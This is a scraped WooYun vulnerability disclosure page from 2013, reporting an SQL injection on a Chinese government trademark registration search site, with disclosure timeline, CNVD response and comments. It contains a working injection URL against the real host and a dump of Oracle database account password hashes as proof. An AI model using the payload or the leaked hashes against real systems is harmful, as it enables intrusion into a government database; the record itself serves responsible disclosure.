中国国家工商行政管理总局SQL注射漏洞 -- 企业注册商标信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018945

漏洞标题：中国国家工商行政管理总局SQL注射漏洞 -- 企业注册商标信息

漏洞作者：路人甲

提交时间：2013-02-20 13:00

修复时间：2013-04-06 13:00

公开时间：2013-04-06 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-02-20：细节已通知厂商并且等待厂商处理中
2013-02-23：厂商已经确认，细节仅向厂商公开
2013-03-05：细节向核心白帽子及相关领域专家公开
2013-03-15：细节向普通白帽子公开
2013-03-25：细节向实习白帽子公开
2013-04-06：细节向公众公开

简要描述：

就是企业申请注册商标的地方啦，问题很多，要是被人把已经注册的商标删除就不开心了是不？

详细说明：

想注册个商标，查询的时候看这个url貌似有点问题

单引号sql报错了

一个字符型注射

http://sbcx.saic.gov.cn/trade/servlet?Search=SX_SelectGS&RegNO=97198'%20and%20'a'='a&IntCls=9
到底有多少个自己发现吧。。。。。忒多

漏洞证明：

database management system users password hashes:
[*] _NEXT_USER [1]:
    password hash: NULL
[*] AQ_ADMINISTRATOR_ROLE [1]:
    password hash: NULL
[*] AQ_USER_ROLE [1]:
    password hash: NULL
[*] CONNECT [1]:
    password hash: NULL
[*] DBA [1]:
    password hash: NULL
[*] DBSNMP [1]:
    password hash: E066D214D5421CCC
[*] DELETE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXECUTE_CATALOG_ROLE [1]:
    password hash: NULL
[*] EXP_FULL_DATABASE [1]:
    password hash: NULL
[*] GATHER_SYSTEM_STATISTICS [1]:
    password hash: NULL
[*] GLOBAL_AQ_USER_ROLE [1]:
    password hash: GLOBAL
[*] HS_ADMIN_ROLE [1]:
    password hash: NULL
[*] IMP_FULL_DATABASE [1]:
    password hash: NULL
[*] LOGSTDBY_ADMINISTRATOR [1]:
    password hash: NULL
[*] OEM_MONITOR [1]:
    password hash: NULL
[*] OUTLN [1]:
    password hash: 4A3BA55E08595C81
[*] PUBLIC [1]:
    password hash: NULL
[*] RECOVERY_CATALOG_OWNER [1]:
    password hash: NULL
[*] RESOURCE [1]:
    password hash: NULL
[*] SA [1]:
    password hash: FB02CF6EC299DA1F
[*] SELECT_CATALOG_ROLE [1]:
    password hash: NULL
[*] SYS [1]:
    password hash: 49F8BCF0CDB5E7AE
[*] SYSTEM [1]:
    password hash: 1C4DCFBD345E90B1
[*] WM_ADMIN_ROLE [1]:
    password hash: NULL
[*] WMSYS [1]:
    password hash: 7C9BA362F8314299

只给部分数据证明吧

看看当前库，TMINFO，额，trademark info？商标信息库吧

修复方案：

注射漏洞，这俩解决了还有好多，肿么办？

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2013-02-23 22:10

厂商回复：

CNVD确认并复现所述情况，已在22日向国家上级信息安全协调机构上报，由其协调国家工商行政管理总局信息化主管部门处置。
按完全影响机密性进行评分，基本危害评分7.79(高危)，发现难度系数1.0，涉及行业或单位影响系数：1.3（子站），综合rank=10.127

漏洞评价：

2013-02-20 20:31 | 溪水流淌 ( 路人 | Rank:9 漏洞数:2 | 如果一切都任我欲为，我会有迷失在这自由深...)

神奇的路人甲。
2013-02-24 17:54 | 残影小L ( 路人 | Rank:12 漏洞数:3 | 我还是我。)

口怕。。。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018945

漏洞标题：中国国家工商行政管理总局SQL注射漏洞 -- 企业注册商标信息

相关厂商：中华人民共和国国家工商行政管理总局

漏洞作者：路人甲

提交时间：2013-02-20 13:00

修复时间：2013-04-06 13:00

公开时间：2013-04-06 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-018945

漏洞标题：中国国家工商行政管理总局SQL注射漏洞 -- 企业注册商标信息

相关厂商：中华人民共和国国家工商行政管理总局

漏洞作者： 路人甲

提交时间：2013-02-20 13:00

修复时间：2013-04-06 13:00

公开时间：2013-04-06 13:00

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-018945"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云